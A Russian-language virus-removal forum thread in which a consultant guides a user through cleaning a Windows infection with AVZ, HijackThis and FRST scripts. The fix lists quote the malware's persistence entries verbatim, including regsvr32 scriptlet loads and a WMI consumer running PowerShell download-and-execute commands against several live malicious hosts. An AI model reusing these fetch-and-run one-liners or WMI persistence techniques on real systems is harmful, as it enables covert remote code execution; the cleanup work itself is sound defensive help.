Перейти к содержимому


Фотография
- - - - -

Что-то мешает работе ПК

Друзья!

 В данном разделе форума действуют дополнительные правила — тема «Общие правила раздела "Уничтожение вирусов"». Пожалуйста, ознакомьтесь с ними перед размещением любого сообщения в данном разделе.

Для оформления запроса о помощи, внимательно прочитайте и аккуратно выполните указания в теме «Порядок оформления запроса о помощи».


  • Закрытая тема Тема закрыта
Сообщений в теме: 12

#1 OFF   ArCtic

ArCtic

    Продвинутый

  • Участники
  • PipPip
  • Cообщений: 145

Отправлено 05 Февраль 2020 - 14:31

Прогнал проверку с диска каспера, 1 вирус нашел - удалил, но все равно тупит комп, kaspersky free не хочет даже устанавливаться, все виснет

Прикрепленные файлы


  • 0

#2 OFF   Sandor

Sandor

    Вежливый хелпер

  • Консультанты
  • Старожилы
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 11 546

Отправлено 05 Февраль 2020 - 14:45

Здравствуйте!

Пролечите систему с помощью KVRT.
Папку C:\KVRT_Data\Reports упакуйте в архив и прикрепите к следующему сообщению.

После этого соберите свежий CollectionLog Автологером.
  • 0
Изображение

#3 OFF   ArCtic

ArCtic

    Продвинутый

  • Участники
  • PipPip
  • Cообщений: 145

Отправлено 05 Февраль 2020 - 15:08

сделал

Прикрепленные файлы


  • 0

#4 OFF   Sandor

Sandor

    Вежливый хелпер

  • Консультанты
  • Старожилы
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 11 546

Отправлено 05 Февраль 2020 - 15:24

Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО.

Выполните скрипт в AVZ (Файл - Выполнить скрипт):

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\WINDOWS\mssecsvc.exe', '');
 DeleteFile('C:\WINDOWS\mssecsvc.exe', '64');
 DeleteService('mssecsvc2.0');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.
Компьютер перезагрузится.



Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KL-).
Хотя, вероятно карантин будет пустой.


"Пофиксите" в HijackThis:
O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll (HKLM) (2020/02/04)
O7 - IPSec: Name: win (2020/02/05) - {a435f289-5707-4b47-bde3-100e722c7fb3} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/05) - {a435f289-5707-4b47-bde3-100e722c7fb3} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/05) - {a435f289-5707-4b47-bde3-100e722c7fb3} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/05) - {a435f289-5707-4b47-bde3-100e722c7fb3} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/05) - {a435f289-5707-4b47-bde3-100e722c7fb3} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O21 - HKLM\..\ShellIconOverlayIdentifiers\00avast: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: \AVAST Software\Overseer - C:\Program Files\Common Files\Avast Software\Overseer\Overseer.exe /from_scheduler:1
O22 - Task: avast! Emergency Update - C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe (file missing)


Повторите логи по правилам. Для повторной диагностики запустите снова Autologger.
Прикрепите к следующему сообщению свежий CollectionLog.
  • 0
Изображение

#5 OFF   ArCtic

ArCtic

    Продвинутый

  • Участники
  • PipPip
  • Cообщений: 145

Отправлено 05 Февраль 2020 - 16:30

пустой был

Прикрепленные файлы


  • 0

#6 OFF   Sandor

Sandor

    Вежливый хелпер

  • Консультанты
  • Старожилы
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 11 546

Отправлено 05 Февраль 2020 - 16:39

пустой был


Не страшно.

Дополнительно:
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
  • 0
Изображение

#7 OFF   ArCtic

ArCtic

    Продвинутый

  • Участники
  • PipPip
  • Cообщений: 145

Отправлено 05 Февраль 2020 - 16:46

готово

Прикрепленные файлы


  • 0

#8 OFF   Sandor

Sandor

    Вежливый хелпер

  • Консультанты
  • Старожилы
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 11 546

Отправлено 05 Февраль 2020 - 16:53

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Start::
    CreateRestorePoint:
    (ssssssssss) [File not signed] C:\Windows\inf\aspnet\lsma12.exe
    C:\Windows\inf\aspnet\lsma12.exe
    HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
    Task: {41F4E037-FF30-40A0-812A-B1644DC2CF29} - \ok -> No File <==== ATTENTION
    Task: {66BE674B-DC27-44F0-AB1E-E6992EC1A368} - \oka -> No File <==== ATTENTION
    Task: {6CD98BA5-20AF-432B-859F-B21C83523D1A} - \Mysa1 -> No File <==== ATTENTION
    Task: {870C2F1A-7C5E-44B0-BACE-1F60DAF9B7B6} - \Mysa2 -> No File <==== ATTENTION
    Task: {8A1FF6F1-E77A-4563-BCAB-A2E968E2D3C0} - \Mysa -> No File <==== ATTENTION
    Task: {B400F348-1E3F-4D71-8DC0-3E0A1A50614D} - \Mysa3 -> No File <==== ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{5ce4092e-d517-4f47-a853-793a7cf73979} <==== ATTENTION (Restriction - IP)
    S2 mssecsvc2.1; C:\WINDOWS\mssecsvr.exe -m security [X]
    NETSVC: Ms5C47DF84App -> no filepath.
    File: C:\Windows\update.exe
    File: C:\Windows\system32\n1.dat
    File: C:\Windows\system32\n.dat
    ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
    WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
    WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION
    WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
    WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
    WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION
    WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

Сообщение отредактировал Sandor: 05 Февраль 2020 - 16:54

  • 0
Изображение

#9 OFF   ArCtic

ArCtic

    Продвинутый

  • Участники
  • PipPip
  • Cообщений: 145

Отправлено 05 Февраль 2020 - 17:03

готово

Прикрепленные файлы

  • Прикрепленный файл  Fixlog.txt   8,31К   скачиваний 1

  • 0

#10 OFF   Sandor

Sandor

    Вежливый хелпер

  • Консультанты
  • Старожилы
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 11 546

Отправлено 05 Февраль 2020 - 17:07

Файл

C:\Windows\update.exe

удалите вручную.

Сообщите что с проблемой.
  • 0
Изображение

#11 OFF   ArCtic

ArCtic

    Продвинутый

  • Участники
  • PipPip
  • Cообщений: 145

Отправлено 05 Февраль 2020 - 19:00

после перезагрузки установил kaspersky free, потом перезагрузил, в итоге проблема вернулась, касперского не оказалось и опять не устанавливается

Прикрепленные файлы


  • 0

#12 OFF   Sandor

Sandor

    Вежливый хелпер

  • Консультанты
  • Старожилы
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 11 546

Отправлено 05 Февраль 2020 - 22:01

"Пофиксите" в HijackThis:
O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll
O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"


Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО.

Выполните скрипт в AVZ (Файл - Выполнить скрипт):

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe');
 QuarantineFile('C:\Windows\inf\aspnet\lsma12.exe', '');
 QuarantineFileF('C:\Windows\inf\aspnet\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 DeleteFile('C:\Windows\inf\aspnet\lsma12.exe', '');
 DeleteFile('C:\Windows\inf\aspnet\lsma12.exe', '64');
 DeleteFileMask('C:\Windows\inf\aspnet\', '*', true);
 DeleteDirectory('C:\Windows\inf\aspnet\');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
RebootWindows(true);
end.
Компьютер перезагрузится.



Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KLAN).




Повторите логи по правилам. Для еще одной повторной диагностики запустите снова Autologger.
Прикрепите к следующему сообщению свежий CollectionLog.
  • 0
Изображение

#13 OFF   ArCtic

ArCtic

    Продвинутый

  • Участники
  • PipPip
  • Cообщений: 145

Отправлено 07 Февраль 2020 - 11:31

В общем, переустановил ОС, с полным форматированием. Спасибо за помощь.


  • 0




Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных